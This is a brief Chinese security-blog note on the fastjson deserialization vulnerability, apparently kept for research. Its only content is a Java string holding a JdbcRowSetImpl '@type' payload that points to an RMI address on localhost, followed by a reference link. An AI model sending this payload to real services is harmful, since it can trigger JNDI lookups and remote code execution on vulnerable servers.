Neurohazard
暮雲煙月,皓首窮經;森羅萬象,如是我聞。

fastjson 反序列化漏洞

wpadmin~July 12, 2019 /InfoSec

fastjson 反序列化漏洞

正文

String payload_2 = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://127.0.0.1:8889/xxx\",\"autoCommit\":true}";

参考资料

https://bithack.io/forum/397

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.